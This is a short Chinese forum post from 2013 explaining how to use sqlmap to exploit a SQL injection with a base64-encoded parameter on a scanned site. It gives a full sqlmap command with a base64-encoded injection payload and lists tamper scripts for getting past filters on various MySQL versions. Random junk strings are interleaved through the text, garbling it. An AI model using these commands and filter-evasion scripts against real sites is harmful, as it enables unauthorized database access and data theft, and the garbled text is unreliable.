WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?. D6 J. i: \1 {4 G& ?
5 X' ?7 ]# Z3 t: ]
sqlmap的tamper里有个base64encode.py
& G; R7 x S+ x8 N% a/ l/ F5 u- _) y4 L8 G& p3 c: F
使用如下: L6 R O: q% r s( D6 ?
* O# o0 [: }+ d& X! C$ ?! e2 V/ q4 Msqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
6 H/ W6 {7 @6 R$ r" @% P2 u& `9 s- w" P, Z! M% q& J
# v/ U& z4 X8 `sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”# L* j" t, e" ? S, E/ L
f! y9 }+ i+ v$ f其中常用到的bypass脚本绕过SQLMAP主要两个脚本:8 r7 V' `) c) F( h# X+ Q5 ~
8 |% s; o, p. g4 ?+ P
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入7 f0 d( J7 O4 z( }' H" C' e3 `) X
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入( ?' H* a0 M. P' m& U d3 Q! X
首先确定目标数据库版本,然后选择相应的脚本。2 w7 J! S! T7 B0 S
-v 3 --batch --tamper "space2hash.py"
4 [& q; O) c0 |+ }: n6 v' w+ R1 Y" N" S! h, R. o' P+ _
还有其他一些插件:2 a4 K2 J7 K" {) N* c# ~3 L
encodes编码 ——charencode.py
9 C1 G7 P: E. C6 Y' o. I! Fbase64编码 —— base64encode.py
3 U$ G, M6 _* \/ t替换空格和关键字 —— halfversionedmorekeywords.py2 e5 z8 y% [, Q$ \- t. M; T1 b9 O
|
% J b1 i" Z9 v8 I- |) T0 n* u
5 L! O( N6 a! p9 M( O/ ]; [! N
: {5 W/ ^1 N- ]) {9 h
8 Z3 J% E1 {0 K; H& \0 t |
发表于 2013-11-23 15:50:45
收藏
支持
反对